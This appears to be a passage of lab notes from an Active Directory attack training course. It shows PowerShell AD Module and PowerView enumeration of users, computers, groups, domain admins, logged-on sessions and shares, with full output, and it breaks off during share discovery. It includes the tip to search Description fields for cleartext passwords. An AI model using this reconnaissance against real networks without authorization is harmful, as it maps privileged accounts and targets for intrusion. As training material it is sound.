_LDAP._TCP.DC._MSDCS.dollarcorp.moneycorp.local SRV service location:
priority = 0
weight = 100
port = 389
svr hostname = dcorp-dc.dollarcorp.moneycorp.local
dcorp-dc.dollarcorp.moneycorp.local internet address = 172.16.2.1
PS C:\Users\student163> nslookup -querytype=SRV _KERBEROS._TCP.dollarcorp.moneycorp.local
DNS request timed out.
timeout was 2 seconds.
Server: UnKnown
Address: 172.16.2.1

_KERBEROS._TCP.dollarcorp.moneycorp.local SRV service location:

priority = 0
weight = 100
port = 88
svr hostname = dcorp-dc.dollarcorp.moneycorp.local
dcorp-dc.dollarcorp.moneycorp.local internet address = 172.16.2.1
PS C:\Users\student163> nslookup -querytype=SRV _KPASSWD._TCP.dollarcorp.moneycorp.local
DNS request timed out.
timeout was 2 seconds.
Server: UnKnown
Address: 172.16.2.1

_KPASSWD._TCP.dollarcorp.moneycorp.local SRV service location:

priority = 0
weight = 100
port = 464
svr hostname = dcorp-dc.dollarcorp.moneycorp.local
dcorp-dc.dollarcorp.moneycorp.local internet address = 172.16.2.1
PS C:\Users\student163> nslookup -querytype=SRV _GC._TCP.moneycorp.local
DNS request timed out.
timeout was 2 seconds.
Server: UnKnown
Address: 172.16.2.1

Non-authoritative answer:
_GC._TCP.moneycorp.local SRV service location:
priority = 0
weight = 100
port = 3268
svr hostname = us-dc.us.dollarcorp.moneycorp.local
_GC._TCP.moneycorp.local SRV service location:
priority = 0
weight = 100
port = 3268
svr hostname = mcorp-dc.moneycorp.local
_GC._TCP.moneycorp.local SRV service location:
priority = 0
weight = 100
port = 3268
svr hostname = dcorp-dc.dollarcorp.moneycorp.local

us-dc.us.dollarcorp.moneycorp.local internet address = 172.16.9.1

mcorp-dc.moneycorp.local internet address = 172.16.1.1
dcorp-dc.dollarcorp.moneycorp.local internet address = 172.16.2.1
User Enumeration
Using AD Module
Getting Details of all users
PS C:\Ad\Tools\ADModule-master> Get-ADUser -Filter * -Properties *

Getting Details of a specific user

PS C:\Ad\Tools\ADModule-master> Get-ADUser -Identity student163 -Properties *

AccountExpirationDate :
accountExpires : 0
AccountLockoutTime :
AccountNotDelegated : False
AllowReversiblePasswordEncryption : False
AuthenticationPolicy : {}
AuthenticationPolicySilo : {}
BadLogonCount : 1582
badPasswordTime : 133626696708478691
badPwdCount : 1582
CannotChangePassword : False
CanonicalName : dollarcorp.moneycorp.local/Users/student163
Certificates : {}
City :
CN : student163
codePage : 0
Company :
CompoundIdentitySupported : {}
Country :
countryCode : 0
Created : 2/21/2024 2:29:23 AM
createTimeStamp : 2/21/2024 2:29:23 AM
Deleted :
Department :
Description :
DisplayName : student163
DistinguishedName : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
Division :
DoesNotRequirePreAuth : False
dSCorePropagationData : {2/21/2024 2:29:23 AM, 12/31/1600 4:00:00 PM}
EmailAddress :
EmployeeID :
EmployeeNumber :
Enabled : True
Fax :
GivenName : student163
HomeDirectory :
HomedirRequired : False
HomeDrive :
HomePage :
HomePhone :
Initials :
instanceType : 4
isDeleted :
KerberosEncryptionType : {}
LastBadPasswordAttempt : 6/12/2024 5:41:10 AM
LastKnownParent :
lastLogoff : 0
lastLogon : 133626680475736068
LastLogonDate : 6/11/2024 10:06:24 PM
lastLogonTimestamp : 133626423845760631
LockedOut : False
logonCount : 19
logonHours : {255, 255, 255, 255...}
LogonWorkstations :
Manager :
MemberOf : {CN=RDP
Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local}
MNSLogonAccount : False
MobilePhone :
Modified : 6/11/2024 10:06:24 PM
modifyTimeStamp : 6/11/2024 10:06:24 PM
msDS-User-Account-Control-Computed : 0
Name : student163
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
ObjectClass : user
ObjectGUID : 09a610a4-e9e6-4672-a07b-2fcc7d26b1c7
objectSid : S-1-5-21-719815819-3726368948-3917688648-13603
Office :
OfficePhone :
Organization :
OtherName :
PasswordExpired : False
PasswordLastSet : 2/21/2024 3:10:40 AM
PasswordNeverExpires : True
PasswordNotRequired : False
POBox :
PostalCode :
PrimaryGroup : CN=Domain
Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
primaryGroupID : 513
PrincipalsAllowedToDelegateToAccount : {}
ProfilePath :
ProtectedFromAccidentalDeletion : False
pwdLastSet : 133529874401633202
SamAccountName : student163
sAMAccountType : 805306368
ScriptPath :
sDRightsEffective : 0
ServicePrincipalNames : {}
SID : S-1-5-21-719815819-3726368948-3917688648-13603
SIDHistory : {}
SmartcardLogonRequired : False
State :
StreetAddress :
Surname :
Title :
TrustedForDelegation : False
TrustedToAuthForDelegation : False
UseDESKeyOnly : False
userAccountControl : 66048
userCertificate : {}
UserPrincipalName : [email protected]
uSNChanged : 1139193
uSNCreated : 200949
whenChanged : 6/11/2024 10:06:24 PM
whenCreated : 2/21/2024 2:29:23 AM

Description Attribute enumeration - It is very important to know how to enumerate the Description
attribute of the users. Sometimes we may obtain clear text passwords used for the service accounts as
part of the Description attribute.
PS C:\Ad\Tools\ADModule-master> Get-ADUser -Filter 'Description -like "*built*"' -Properties
Description | Select Name, Description

Name Description
---- -----------
Administrator Built-in account for administering the computer/domain
Guest Built-in account for guest access to the computer/domain

Using PowerView
Getting Details of all users
PS C:\Users\student163> Get-DomainUser

Getting Details of a specific user

PS C:\Users\student163> Get-DomainUser -Identity student163 -Properties *

logoncount : 19
badpasswordtime : 6/12/2024 5:47:32 AM
distinguishedname : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : student163
lastlogontimestamp : 6/11/2024 10:06:24 PM
userprincipalname : [email protected]
samaccountname : student163
logonhours : @{Tuesday=System.Collections.Hashtable;
Friday=System.Collections.Hashtable;
Wednesday=System.Collections.Hashtable;
Saturday=System.Collections.Hashtable;
Thursday=System.Collections.Hashtable;
Monday=System.Collections.Hashtable;
Sunday=System.Collections.Hashtable}
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : 12/31/1600 4:00:00 PM
countrycode : 0
whenchanged : 6/12/2024 5:06:24 AM
instancetype : 4
usncreated : 200949
objectguid : 09a610a4-e9e6-4672-a07b-2fcc7d26b1c7
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:29:23 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:29:23 AM, 1/1/1601 12:00:00 AM}
givenname : student163
usnchanged : 1139193
memberof : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
lastlogon : 6/12/2024 5:14:07 AM
badpwdcount : 1954
cn : student163
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
objectsid : S-1-5-21-719815819-3726368948-3917688648-13603
primarygroupid : 513
pwdlastset : 2/21/2024 3:10:40 AM
name : student163

Description Attribute enumeration

PS C:\Users\student163> Get-DomainUser -LDAPFilter "Description=*built*" | Select Name,
Description

name description
---- -----------
Administrator Built-in account for administering the computer/domain
Guest Built-in account for guest access to the computer/domain

Computer Enumeration
Using AD Module
Getting Details of all the computers
PS C:\Ad\Tools\ADModule-master> Get-ADComputer -Filter * -Properties *

Getting details of machines with specific Operating systems

PS C:\Ad\Tools\ADModule-master> Get-ADComputer -Filter 'OperatingSystem -like "*Server 2022*"' -
Properties OperatingSystem | Select Name, OperatingSystem

Name OperatingSystem
---- ---------------
DCORP-DC Windows Server 2022 Standard
DCORP-ADMINSRV Windows Server 2022 Datacenter
DCORP-APPSRV Windows Server 2022 Datacenter
DCORP-CI Windows Server 2022 Datacenter
DCORP-MGMT Windows Server 2022 Datacenter
DCORP-MSSQL Windows Server 2022 Datacenter
DCORP-SQL1 Windows Server 2022 Datacenter
DCORP-STDADMIN Windows Server 2022 Standard
DCORP-STD161 Windows Server 2022 Standard
DCORP-STD162 Windows Server 2022 Standard
DCORP-STD163 Windows Server 2022 Standard
DCORP-STD164 Windows Server 2022 Standard
DCORP-STD165 Windows Server 2022 Standard
DCORP-STD166 Windows Server 2022 Standard
DCORP-STD168 Windows Server 2022 Standard
DCORP-STD167 Windows Server 2022 Standard
DCORP-STD169 Windows Server 2022 Standard
DCORP-STD170 Windows Server 2022 Standard
DCORP-STD171 Windows Server 2022 Standard
DCORP-STD172 Windows Server 2022 Standard
DCORP-STD173 Windows Server 2022 Standard
DCORP-STD174 Windows Server 2022 Standard
DCORP-STD175 Windows Server 2022 Standard
DCORP-STD176 Windows Server 2022 Standard
DCORP-STD177 Windows Server 2022 Standard
DCORP-STD178 Windows Server 2022 Standard
DCORP-STD180 Windows Server 2022 Standard
DCORP-STD179 Windows Server 2022 Standard

Using PowerView
Getting Details of all the computers
PS C:\Users\student163> Get-DomainComputer -Properties *

Getting Details of Computers with specific Operating systems

PS C:\Users\student163> Get-DomainComputer -OperatingSystem "*Server 2022*" | select
cn,operatingsystem

cn operatingsystem
-- ---------------
DCORP-DC Windows Server 2022 Standard
DCORP-ADMINSRV Windows Server 2022 Datacenter
DCORP-APPSRV Windows Server 2022 Datacenter
DCORP-CI Windows Server 2022 Datacenter
DCORP-MGMT Windows Server 2022 Datacenter
DCORP-MSSQL Windows Server 2022 Datacenter
DCORP-SQL1 Windows Server 2022 Datacenter
DCORP-STDADMIN Windows Server 2022 Standard
DCORP-STD161 Windows Server 2022 Standard
DCORP-STD162 Windows Server 2022 Standard
DCORP-STD163 Windows Server 2022 Standard
DCORP-STD164 Windows Server 2022 Standard
DCORP-STD165 Windows Server 2022 Standard
DCORP-STD166 Windows Server 2022 Standard
DCORP-STD168 Windows Server 2022 Standard
DCORP-STD167 Windows Server 2022 Standard
DCORP-STD169 Windows Server 2022 Standard
DCORP-STD170 Windows Server 2022 Standard
DCORP-STD171 Windows Server 2022 Standard
DCORP-STD172 Windows Server 2022 Standard
DCORP-STD173 Windows Server 2022 Standard
DCORP-STD174 Windows Server 2022 Standard
DCORP-STD175 Windows Server 2022 Standard
DCORP-STD176 Windows Server 2022 Standard
DCORP-STD177 Windows Server 2022 Standard
DCORP-STD178 Windows Server 2022 Standard
DCORP-STD180 Windows Server 2022 Standard
DCORP-STD179 Windows Server 2022 Standard
Group Enumeration
Using AD Module
Getting the details of all the groups
PS C:\Ad\Tools\ADModule-master> Get-ADGroup -Filter * -Properties * | Select CN

CN
--
Administrators
Users
Guests
Print Operators
Backup Operators
Replicator
Remote Desktop Users
Network Configuration Operators
Performance Monitor Users
Performance Log Users
Distributed COM Users
IIS_IUSRS
Cryptographic Operators
Event Log Readers
Certificate Service DCOM Access
RDS Remote Access Servers
RDS Endpoint Servers
RDS Management Servers
Hyper-V Administrators
Access Control Assistance Operators
Remote Management Users
Storage Replica Administrators
Domain Computers
Domain Controllers
Cert Publishers
Domain Admins
Domain Users
Domain Guests
Group Policy Creator Owners
RAS and IAS Servers
Server Operators
Account Operators
Pre-Windows 2000 Compatible Access
Windows Authorization Access Group
Terminal Server License Servers
Allowed RODC Password Replication Group
Denied RODC Password Replication Group
Read-only Domain Controllers
Cloneable Domain Controllers
Protected Users
Key Admins
DnsAdmins
DnsUpdateProxy
RDP Users

Getting the details of the groups which has admin in its name
PS C:\Ad\Tools\ADModule-master> Get-ADGroup -Filter 'Name -like "*admin*"' | Select name

name
----
Administrators
Hyper-V Administrators
Storage Replica Administrators
Domain Admins
Key Admins
DnsAdmins

Getting the members of a Domain Group

PS C:\Ad\Tools\ADModule-master> Get-ADGroupMember -Identity "Domain Admins"

distinguishedName : CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
name : Administrator
objectClass : user
objectGUID : d954e824-f549-47c2-9809-646c218cef36
SamAccountName : Administrator
SID : S-1-5-21-719815819-3726368948-3917688648-500

distinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local

name : svc admin
objectClass : user
objectGUID : 244f9c84-7e33-4ed6-aca1-3328d0802db0
SamAccountName : svcadmin
SID : S-1-5-21-719815819-3726368948-3917688648-1118

PS C:\Ad\Tools\ADModule-master> Get-ADGroupMember -Identity "Domain Admins" -Recursive

distinguishedName : CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
name : Administrator
objectClass : user
objectGUID : d954e824-f549-47c2-9809-646c218cef36
SamAccountName : Administrator
SID : S-1-5-21-719815819-3726368948-3917688648-500

distinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local

name : svc admin
objectClass : user
objectGUID : 244f9c84-7e33-4ed6-aca1-3328d0802db0
SamAccountName : svcadmin
SID : S-1-5-21-719815819-3726368948-3917688648-1118

Getting Group Membership of a user

PS C:\Ad\Tools\ADModule-master> Get-ADPrincipalGroupMembership -Identity "student163"

distinguishedName : CN=Domain Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local

GroupCategory : Security
GroupScope : Global
name : Domain Users
objectClass : group
objectGUID : 62eb9236-f62f-4f53-938b-042a559741e7
SamAccountName : Domain Users
SID : S-1-5-21-719815819-3726368948-3917688648-513

distinguishedName : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local

GroupCategory : Security
GroupScope : Global
name : RDP Users
objectClass : group
objectGUID : 09a8ff04-9b4e-4ed8-abaa-d8ffccf6d4c6
SamAccountName : RDPUsers
SID : S-1-5-21-719815819-3726368948-3917688648-1123

Getting the list of Disabled accounts

PS C:\Windows\system32> Get-DomainUser -UACFilter ACCOUNTDISABLE | Select CN

cn
--
Guest
krbtgt

Using PowerView
Getting the details of all the groups
PS C:\Users\student163> Get-DomainGroup | Select Name

name
----
Administrators
Users
Guests
Print Operators
Backup Operators
Replicator
Remote Desktop Users
Network Configuration Operators
Performance Monitor Users
Performance Log Users
Distributed COM Users
IIS_IUSRS
Cryptographic Operators
Event Log Readers
Certificate Service DCOM Access
RDS Remote Access Servers
RDS Endpoint Servers
RDS Management Servers
Hyper-V Administrators
Access Control Assistance Operators
Remote Management Users
Storage Replica Administrators
Domain Computers
Domain Controllers
Cert Publishers
Domain Admins
Domain Users
Domain Guests
Group Policy Creator Owners
RAS and IAS Servers
Server Operators
Account Operators
Pre-Windows 2000 Compatible Access
Windows Authorization Access Group
Terminal Server License Servers
Allowed RODC Password Replication Group
Denied RODC Password Replication Group
Read-only Domain Controllers
Cloneable Domain Controllers
Protected Users
Key Admins
DnsAdmins
DnsUpdateProxy
RDP Users

Getting the details of the groups which has admin in its name
PS C:\Users\student163> Get-DomainGroup *admin*

grouptype : CREATED_BY_SYSTEM, DOMAIN_LOCAL_SCOPE, SECURITY

admincount : 1
iscriticalsystemobject : True
samaccounttype : ALIAS_OBJECT
samaccountname : Administrators
systemflags : -1946157056
objectsid : S-1-5-32-544
objectclass : {top, group}
cn : Administrators
usnchanged : 13126
dscorepropagationdata : {11/12/2022 6:14:52 AM, 11/12/2022 5:59:41 AM, 1/1/1601 12:04:16 AM}
name : Administrators
description : Administrators have complete and unrestricted access to the
computer/domain
distinguishedname : CN=Administrators,CN=Builtin,DC=dollarcorp,DC=moneycorp,DC=local
member : {CN=Enterprise Admins,CN=Users,DC=moneycorp,DC=local, CN=Domain
Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local,
CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local}
usncreated : 8199
whencreated : 11/12/2022 5:59:01 AM
whenchanged : 11/12/2022 6:29:52 AM
instancetype : 4
objectguid : 598de368-27e8-4d00-99b0-c32895f84232
objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

grouptype : CREATED_BY_SYSTEM, DOMAIN_LOCAL_SCOPE, SECURITY

systemflags : -1946157056
iscriticalsystemobject : True
samaccounttype : ALIAS_OBJECT
samaccountname : Hyper-V Administrators
whenchanged : 11/12/2022 5:59:01 AM
objectsid : S-1-5-32-578
objectclass : {top, group}
cn : Hyper-V Administrators
usnchanged : 8229
dscorepropagationdata : {11/12/2022 5:59:41 AM, 1/1/1601 12:00:01 AM}
name : Hyper-V Administrators
description : Members of this group have complete and unrestricted access to all
features of Hyper-V.
distinguishedname : CN=Hyper-V Administrators,CN=Builtin,DC=dollarcorp,DC=moneycorp,DC=local
usncreated : 8229
whencreated : 11/12/2022 5:59:01 AM
instancetype : 4
objectguid : 477e3360-275a-4cec-983d-11e55cee0e46
objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

grouptype : CREATED_BY_SYSTEM, DOMAIN_LOCAL_SCOPE, SECURITY

systemflags : -1946157056
iscriticalsystemobject : True
samaccounttype : ALIAS_OBJECT
samaccountname : Storage Replica Administrators
whenchanged : 11/12/2022 5:59:01 AM
objectsid : S-1-5-32-582
objectclass : {top, group}
cn : Storage Replica Administrators
usnchanged : 8232
dscorepropagationdata : {11/12/2022 5:59:41 AM, 1/1/1601 12:00:01 AM}
name : Storage Replica Administrators
description : Members of this group have complete and unrestricted access to all
features of Storage
Replica.
distinguishedname : CN=Storage Replica
Administrators,CN=Builtin,DC=dollarcorp,DC=moneycorp,DC=local
usncreated : 8232
whencreated : 11/12/2022 5:59:01 AM
instancetype : 4
objectguid : acdd05e6-1435-424b-aae1-37aa868c78d8
objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

grouptype : GLOBAL_SCOPE, SECURITY

admincount : 1
iscriticalsystemobject : True
samaccounttype : GROUP_OBJECT
samaccountname : Domain Admins
whenchanged : 11/14/2022 5:06:37 PM
objectsid : S-1-5-21-719815819-3726368948-3917688648-512
name : Domain Admins
cn : Domain Admins
instancetype : 4
usnchanged : 40124
dscorepropagationdata : {11/12/2022 6:14:52 AM, 11/12/2022 5:59:41 AM, 1/1/1601 12:04:16 AM}
objectguid : 7d766421-bcf7-40b1-a970-17da0bedb489
description : Designated administrators of the domain
memberof : {CN=Denied RODC Password Replication
Group,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local,
CN=Administrators,CN=Builtin,DC=dollarcorp,DC=moneycorp,DC=local}
member : {CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local,
CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local}
usncreated : 12315
whencreated : 11/12/2022 5:59:41 AM
distinguishedname : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, group}
objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
grouptype : GLOBAL_SCOPE, SECURITY
admincount : 1
iscriticalsystemobject : True
samaccounttype : GROUP_OBJECT
samaccountname : Key Admins
whenchanged : 11/12/2022 6:14:52 AM
objectsid : S-1-5-21-719815819-3726368948-3917688648-526
objectclass : {top, group}
cn : Key Admins
usnchanged : 12945
dscorepropagationdata : {11/12/2022 6:14:52 AM, 11/12/2022 5:59:41 AM, 1/1/1601 12:04:16 AM}
name : Key Admins
description : Members of this group can perform administrative actions on key objects
within the domain.
distinguishedname : CN=Key Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
usncreated : 12409
whencreated : 11/12/2022 5:59:41 AM
instancetype : 4
objectguid : 0a5c3344-9caf-45d5-9fd3-909a76045d63
objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

grouptype : DOMAIN_LOCAL_SCOPE, SECURITY

name : DnsAdmins
samaccounttype : ALIAS_OBJECT
samaccountname : DnsAdmins
whenchanged : 11/14/2022 12:56:21 PM
objectsid : S-1-5-21-719815819-3726368948-3917688648-1101
objectclass : {top, group}
cn : DnsAdmins
usnchanged : 38235
dscorepropagationdata : 1/1/1601 12:00:00 AM
description : DNS Administrators Group
distinguishedname : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
member : CN=srv admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
usncreated : 12440
whencreated : 11/12/2022 6:00:24 AM
instancetype : 4
objectguid : d7358d36-dc01-4450-8269-f716fbf2e5dd
objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

Getting the details of the groups from the parent domain

PS C:\Users\student163> Get-DomainGroup -Domain moneycorp.local | Select name

name
----
Administrators
Users
Guests
Print Operators
Backup Operators
Replicator
Remote Desktop Users
Network Configuration Operators
Performance Monitor Users
Performance Log Users
Distributed COM Users
IIS_IUSRS
Cryptographic Operators
Event Log Readers
Certificate Service DCOM Access
RDS Remote Access Servers
RDS Endpoint Servers
RDS Management Servers
Hyper-V Administrators
Access Control Assistance Operators
Remote Management Users
Storage Replica Administrators
Domain Computers
Domain Controllers
Schema Admins
Enterprise Admins
Cert Publishers
Domain Admins
Domain Users
Domain Guests
Group Policy Creator Owners
RAS and IAS Servers
Server Operators
Account Operators
Pre-Windows 2000 Compatible Access
Incoming Forest Trust Builders
Windows Authorization Access Group
Terminal Server License Servers
Allowed RODC Password Replication Group
Denied RODC Password Replication Group
Read-only Domain Controllers
Enterprise Read-only Domain Controllers
Cloneable Domain Controllers
Protected Users
Key Admins
Enterprise Key Admins
DnsAdmins
DnsUpdateProxy

Getting the details of the groups from the trusting domain

PS C:\Users\student163> Get-DomainGroup -Domain eurocorp.local | Select name

name
----
Administrators
Users
Guests
Print Operators
Backup Operators
Replicator
Remote Desktop Users
Network Configuration Operators
Performance Monitor Users
Performance Log Users
Distributed COM Users
IIS_IUSRS
Cryptographic Operators
Event Log Readers
Certificate Service DCOM Access
RDS Remote Access Servers
RDS Endpoint Servers
RDS Management Servers
Hyper-V Administrators
Access Control Assistance Operators
Remote Management Users
Storage Replica Administrators
Domain Computers
Domain Controllers
Schema Admins
Enterprise Admins
Cert Publishers
Domain Admins
Domain Users
Domain Guests
Group Policy Creator Owners
RAS and IAS Servers
Server Operators
Account Operators
Pre-Windows 2000 Compatible Access
Incoming Forest Trust Builders
Windows Authorization Access Group
Terminal Server License Servers
Allowed RODC Password Replication Group
Denied RODC Password Replication Group
Read-only Domain Controllers
Enterprise Read-only Domain Controllers
Cloneable Domain Controllers
Protected Users
Key Admins
Enterprise Key Admins
DnsAdmins
DnsUpdateProxy

Getting the members of the groups

PS C:\Users\student163> Get-DomainGroupMember -Identity "Domain Admins"

GroupDomain : dollarcorp.moneycorp.local
GroupName : Domain Admins
GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
MemberDomain : dollarcorp.moneycorp.local
MemberName : svcadmin
MemberDistinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
MemberObjectClass : user
MemberSID : S-1-5-21-719815819-3726368948-3917688648-1118

GroupDomain : dollarcorp.moneycorp.local
GroupName : Domain Admins
GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
MemberDomain : dollarcorp.moneycorp.local
MemberName : Administrator
MemberDistinguishedName : CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
MemberObjectClass : user
MemberSID : S-1-5-21-719815819-3726368948-3917688648-500
PS C:\Users\student163> Get-DomainGroupMember -Identity "Domain Admins" -Recurse

GroupDomain : dollarcorp.moneycorp.local
GroupName : Domain Admins
GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
MemberDomain : dollarcorp.moneycorp.local
MemberName : svcadmin
MemberDistinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
MemberObjectClass : user
MemberSID : S-1-5-21-719815819-3726368948-3917688648-1118

GroupDomain : dollarcorp.moneycorp.local
GroupName : Domain Admins
GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
MemberDomain : dollarcorp.moneycorp.local
MemberName : Administrator
MemberDistinguishedName : CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
MemberObjectClass : user
MemberSID : S-1-5-21-719815819-3726368948-3917688648-500

Getting the local groups on a machine

This requires administrative privileges on the Non-Domain Controllers

PS C:\Users\student163> Get-NetLocalGroup -ComputerName dcorp-dc.dollarcorp.moneycorp.local

ComputerName GroupName Comment

------------ --------- -------
dcorp-dc.dollarcorp.moneycorp.local Guests Guests have the same
access as members o...
dcorp-dc.dollarcorp.moneycorp.local Print Operators Members can
administer printers installe...
dcorp-dc.dollarcorp.moneycorp.local Backup Operators Backup Operators can
override security r...
dcorp-dc.dollarcorp.moneycorp.local Replicator Supports file
replication in a domain
dcorp-dc.dollarcorp.moneycorp.local Remote Desktop Users Members in this group
are granted the ri...
dcorp-dc.dollarcorp.moneycorp.local Network Configuration Operators Members in this group
can have some admi...
dcorp-dc.dollarcorp.moneycorp.local Performance Monitor Users Members of this group
can access perform...
dcorp-dc.dollarcorp.moneycorp.local Performance Log Users Members of this group
may schedule loggi...
dcorp-dc.dollarcorp.moneycorp.local Distributed COM Users Members are allowed
to launch, activate ...
dcorp-dc.dollarcorp.moneycorp.local IIS_IUSRS Built-in group used
by Internet Informat...
dcorp-dc.dollarcorp.moneycorp.local Cryptographic Operators Members are
authorized to perform crypto...
dcorp-dc.dollarcorp.moneycorp.local Event Log Readers Members of this group
can read event log...
dcorp-dc.dollarcorp.moneycorp.local Certificate Service DCOM Access Members of this group
are allowed to con...
dcorp-dc.dollarcorp.moneycorp.local RDS Remote Access Servers Servers in this group
enable users of Re...
dcorp-dc.dollarcorp.moneycorp.local RDS Endpoint Servers Servers in this group
run virtual machin...
dcorp-dc.dollarcorp.moneycorp.local RDS Management Servers Servers in this group
can perform routin...
dcorp-dc.dollarcorp.moneycorp.local Hyper-V Administrators Members of this group
have complete and ...
dcorp-dc.dollarcorp.moneycorp.local Access Control Assistance Operators Members of this group
can remotely query...
dcorp-dc.dollarcorp.moneycorp.local Remote Management Users Members of this group
can access WMI res...
dcorp-dc.dollarcorp.moneycorp.local Storage Replica Administrators Members of this group
have complete and ...
dcorp-dc.dollarcorp.moneycorp.local Server Operators Members can
administer domain servers
dcorp-dc.dollarcorp.moneycorp.local Account Operators Members can
administer domain user and g...
dcorp-dc.dollarcorp.moneycorp.local Pre-Windows 2000 Compatible Access A backward
compatibility group which all...
dcorp-dc.dollarcorp.moneycorp.local Windows Authorization Access Group Members of this group
have access to the...
dcorp-dc.dollarcorp.moneycorp.local Terminal Server License Servers Members of this group
can update user ac...
dcorp-dc.dollarcorp.moneycorp.local Administrators Administrators have
complete and unrestr...
dcorp-dc.dollarcorp.moneycorp.local Users Users are prevented
from making accident...
dcorp-dc.dollarcorp.moneycorp.local Cert Publishers Members of this group
are permitted to p...
dcorp-dc.dollarcorp.moneycorp.local RAS and IAS Servers Servers in this group
can access remote ...
dcorp-dc.dollarcorp.moneycorp.local Allowed RODC Password Replication Group Members in this group
can have their pas...
dcorp-dc.dollarcorp.moneycorp.local Denied RODC Password Replication Group Members in this group
cannot have their ...
dcorp-dc.dollarcorp.moneycorp.local DnsAdmins DNS Administrators
Group

Getting members of local group "Administrators" on a machine

This requires administrative privileges on the Non-Domain Controllers

PS C:\Users\student163> Get-NetLocalGroupMember -ComputerName dcorp-dc.dollarcorp.moneycorp.local

ComputerName : dcorp-dc.dollarcorp.moneycorp.local
GroupName : Administrators
MemberName : dcorp\Administrator
SID : S-1-5-21-719815819-3726368948-3917688648-500
IsGroup : False
IsDomain : False

ComputerName : dcorp-dc.dollarcorp.moneycorp.local
GroupName : Administrators
MemberName : dcorp\Domain Admins
SID : S-1-5-21-719815819-3726368948-3917688648-512
IsGroup : True
IsDomain : False

ComputerName : dcorp-dc.dollarcorp.moneycorp.local
GroupName : Administrators
MemberName : mcorp\Enterprise Admins
SID : S-1-5-21-335606122-960912869-3279953914-519
IsGroup : True
IsDomain : True

Sessions Enumeration
Using Powerview
Getting the actively logged on users on a computer

This requires administrative privileges on the target

PS C:\Users\student163> Get-NetLoggedon -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local

UserName : srvadmin
LogonDomain : dcorp
AuthDomains :
LogonServer : DCORP-DC
ComputerName : dcorp-adminsrv.dollarcorp.moneycorp.local

UserName : DCORP-ADMINSRV$
LogonDomain : dcorp
AuthDomains :
LogonServer :
ComputerName : dcorp-adminsrv.dollarcorp.moneycorp.local

UserName : websvc
LogonDomain : dcorp
AuthDomains :
LogonServer : DCORP-DC
ComputerName : dcorp-adminsrv.dollarcorp.moneycorp.local

UserName : appadmin
LogonDomain : dcorp
AuthDomains :
LogonServer : DCORP-DC
ComputerName : dcorp-adminsrv.dollarcorp.moneycorp.local

UserName : DCORP-ADMINSRV$
LogonDomain : dcorp
AuthDomains :
LogonServer :
ComputerName : dcorp-adminsrv.dollarcorp.moneycorp.local

UserName : DCORP-ADMINSRV$
LogonDomain : dcorp
AuthDomains :
LogonServer :
ComputerName : dcorp-adminsrv.dollarcorp.moneycorp.local

UserName : DCORP-ADMINSRV$
LogonDomain : dcorp
AuthDomains :
LogonServer :
ComputerName : dcorp-adminsrv.dollarcorp.moneycorp.local

Getting the locally logged on users on a computer

This requires remote registry service on the target running. By default, on Server Operating systems, this
service runs while on client operating systems this service is in disabled state.
PS C:\Users\student163> Get-LoggedOnLocal -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local

Getting the last logged on user on the computer

This requires both administrative privileges and the remote registry service on the target running.
PS C:\Users\student163> Get-LastLoggedOn -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local

ComputerName LastLoggedOn
------------ ------------
dcorp-adminsrv.dollarcorp.moneycorp.local .\Administrator

Shares Enumeration
Using Powerview
Getting shares on the hosts in the current domain
PS C:\Users\student163> Invoke-Sharefinder -Verbose
VERBOSE: [Find-DomainShare] Querying computers in the domain
VERBOSE: [Get-DomainSearcher] search base:
